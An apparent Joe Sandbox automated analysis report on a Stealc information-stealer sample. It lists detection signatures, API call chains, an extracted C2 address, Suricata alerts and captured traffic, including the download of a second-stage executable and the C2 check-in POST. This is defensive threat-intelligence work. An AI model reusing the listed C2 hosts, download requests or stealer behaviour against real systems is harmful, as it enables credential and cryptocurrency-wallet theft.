Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
mCe4hBfqCT.exe

Overview

General Information

Sample name:mCe4hBfqCT.exe
renamed because original name is a hash value
Original sample name:5b01b239f2b48841380e3665d1c3f98a.exe
Analysis ID:1542736
MD5:5b01b239f2b48841380e3665d1c3f98a
SHA1:ae35e49abca5950c5be20ef121ee8d74a903b877
SHA256:8c32b0c595db81613c72044bb9d2d3d8170916760d30b7bf0c9710da462a2bb2
Tags:exeStealcuser-abuse_ch
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Machine Learning detection for dropped file
Machine Learning detection for sample
Searches for specific processes (likely to inject)
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • mCe4hBfqCT.exe (PID: 4672 cmdline: "C:\Users\user\Desktop\mCe4hBfqCT.exe" MD5: 5B01B239F2B48841380E3665D1C3F98A)
    • 64A.tmp.exe (PID: 5576 cmdline: "C:\Users\user\AppData\Local\Temp\64A.tmp.exe" MD5: 676EE4608A4ABD53EBDD6B380C2A3817)
      • WerFault.exe (PID: 1412 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5576 -s 1044 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://62.204.41.177/edd20096ecef326d.php", "Botnet": "default9_cap"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.4504249917.0000000002D29000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
    • 0x1240:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
    00000002.00000003.2179254036.0000000004820000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000002.00000002.2422568211.0000000002D19000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
      • 0xd48:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      00000002.00000002.2422589956.0000000002D43000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
        • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
        Click to see the 5 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.64A.tmp.exe.2f00e67.3.unpackJoeSecurity_StealcYara detected StealcJoe Security
          2.2.64A.tmp.exe.400000.1.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
            2.2.64A.tmp.exe.2f00e67.3.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
              2.2.64A.tmp.exe.400000.1.unpackJoeSecurity_StealcYara detected StealcJoe Security
                2.3.64A.tmp.exe.4820000.0.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                  Click to see the 1 entries

                  Sigma Signatures

                  No Sigma rule has matched

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-26T08:56:18.476436+020020442431Malware Command and Control Activity Detected192.168.2.54970662.204.41.17780TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-26T08:56:07.383952+020028032742Potentially Bad Traffic192.168.2.549704104.21.56.70443TCP
                  2024-10-26T08:56:08.479342+020028032742Potentially Bad Traffic192.168.2.549705176.113.115.3780TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: mCe4hBfqCT.exeAvira: detected
                  Antivirus detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeAvira: detection malicious, Label: HEUR/AGEN.1312567
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ScreenUpdateSync[1].exeAvira: detection malicious, Label: HEUR/AGEN.1312567
                  Found malware configuration
                  Source: 00000002.00000003.2179254036.0000000004820000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://62.204.41.177/edd20096ecef326d.php", "Botnet": "default9_cap"}
                  Multi AV Scanner detection for domain / URL
                  Source: http://62.204.41.177/edd20096ecef326d.phpVirustotal: Detection: 17%Perma Link
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ScreenUpdateSync[1].exeReversingLabs: Detection: 44%
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeReversingLabs: Detection: 44%
                  Multi AV Scanner detection for submitted file
                  Source: mCe4hBfqCT.exeReversingLabs: Detection: 39%
                  Source: mCe4hBfqCT.exeVirustotal: Detection: 41%Perma Link
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ScreenUpdateSync[1].exeJoe Sandbox ML: detected
                  Machine Learning detection for sample
                  Source: mCe4hBfqCT.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_0040C820 memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA,lstrcatA,2_2_0040C820
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_00407240 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,2_2_00407240
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_00409AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,2_2_00409AC0
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_00418EA0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,2_2_00418EA0
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_00409B60 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,2_2_00409B60
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_02F0CA87 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,lstrcat,2_2_02F0CA87
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_02F074A7 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,2_2_02F074A7
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_02F09DC7 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,2_2_02F09DC7
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_02F09D27 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,2_2_02F09D27
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_02F19107 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,2_2_02F19107

                  Compliance

                  barindex
                  Detected unpacking (overwrites its own PE header)
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeUnpacked PE file: 0.2.mCe4hBfqCT.exe.400000.0.unpack
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeUnpacked PE file: 2.2.64A.tmp.exe.400000.1.unpack
                  Source: mCe4hBfqCT.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                  Source: unknownHTTPS traffic detected: 104.21.56.70:443 -> 192.168.2.5:49704 version: TLS 1.2
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_00438A12 FindFirstFileExW,0_2_00438A12
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_03048C79 FindFirstFileExW,0_2_03048C79
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,2_2_0040E430
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,2_2_004138B0
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,2_2_00414570
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_00414910
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,2_2_0040ED20
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,2_2_0040BE70
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0040DE10
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_004016D0
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_0040DA80
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,2_2_00413EA0
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0040F6B0
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_02F0E697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,2_2_02F0E697
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_02F147D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,2_2_02F147D7
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_02F0EF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,2_2_02F0EF87
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_02F14B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_02F14B77
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_02F13B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,2_2_02F13B17
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_02F0F8F1 FindFirstFileA,2_2_02F0F8F1
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_02F0DCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_02F0DCE7
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_02F0C0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,2_2_02F0C0D7
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_02F0E077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_02F0E077
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_02F01937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_02F01937
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_02F0F917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_02F0F917
                  Source: C:\Users\user\AppData\Local\Temp\64A.tmp.exeCode function: 2_2_02F14107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,2_2_02F14107

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49706 -> 62.204.41.177:80
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: http://62.204.41.177/edd20096ecef326d.php
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 26 Oct 2024 06:56:08 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Sat, 26 Oct 2024 06:45:02 GMTETag: "56000-6255b9332d227"Accept-Ranges: bytesContent-Length: 352256Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 f9 56 c7 b3 bd 37 a9 e0 bd 37 a9 e0 bd 37 a9 e0 00 78 3f e0 bc 37 a9 e0 a3 65 2d e0 a1 37 a9 e0 a3 65 3c e0 ac 37 a9 e0 a3 65 2a e0 e0 37 a9 e0 9a f1 d2 e0 b8 37 a9 e0 bd 37 a8 e0 c4 37 a9 e0 a3 65 23 e0 bc 37 a9 e0 a3 65 3d e0 bc 37 a9 e0 a3 65 38 e0 bc 37 a9 e0 52 69 63 68 bd 37 a9 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 12 12 b8 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 70 03 00 00 44 72 02 00 00 00 00 1f 17 00 00 00 10 00 00 00 80 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 a0 75 02 00 04 00 00 4d bf 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ac 98 03 00 3c 00 00 00 00 20 74 02 38 7b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 03 00 a8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 70 6f 03 00 00 10 00 00 00 70 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 50 22 00 00 00 80 03 00 00 24 00 00 00 74 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 7c 10 70 02 00 b0 03 00 00 14 00 00 00 98 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 75 68 69 00 00 00 00 44 00 00 00 d0 73 02 00 38 00 00 00 ac 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 38 7b 01 00 00 20 74 02 00 7c 01 00 00 e4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 62.204.41.177Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGDHDHJEBGHJKFIECBGHost: 62.204.41.177Content-Length: 218Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 45 46 42 45 43 44 45 31 32 33 39 37 38 36 32 35 34 35 31 33 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 39 5f 63 61 70 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 44 48 44 48 4a 45 42 47 48 4a 4b 46 49 45 43 42 47 2d 2d 0d 0a Data Ascii: ------ECGDHDHJEBGHJKFIECBGContent-Disposition: form-data; name="hwid"0EFBECDE1239786254513------ECGDHDHJEBGHJKFIECBGContent-Disposition: form-data; name="build"default9_cap------ECGDHDHJEBGHJKFIECBG--
                  Source: Joe Sandbox ViewIP Address: 176.113.115.37 176.113.115.37
                  Source: Joe Sandbox ViewIP Address: 62.204.41.177 62.204.41.177
                  Source: Joe Sandbox ViewASN Name: TNNET-ASTNNetOyMainnetworkFI TNNET-ASTNNetOyMainnetworkFI
                  Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49705 -> 176.113.115.37:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49704 -> 104.21.56.70:443
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.37
                  Source: C:\Users\user\Desktop\mCe4hBfqCT.exeCode function: 0_2_00402A14 InternetOpenW,InternetOpenUrlW,GetTempPathW,GetTempFileNameW,CreateFileW,InternetReadFile,WriteFile,CloseHandle,CloseHandle,ShellExecuteExW,WaitForSingleObject,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00402A14
                  Source: global trafficHTTP traffic detected: GET /track_prt.php?sub=0&cc=DE HTTP/1.1User-Agent: ShareScreenHost: post-to-me.com
                  Source: global trafficHTTP traffic detected: GET /ScreenUpdateSync.exe HTTP/1.1User-Agent: ShareScreenHost: 176.113.115.37
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 62.204.41.177Connection: Keep-AliveCache-Control: no-cache
                  Source: global trafficDNS traffic detected: DNS query: post-to-me.com
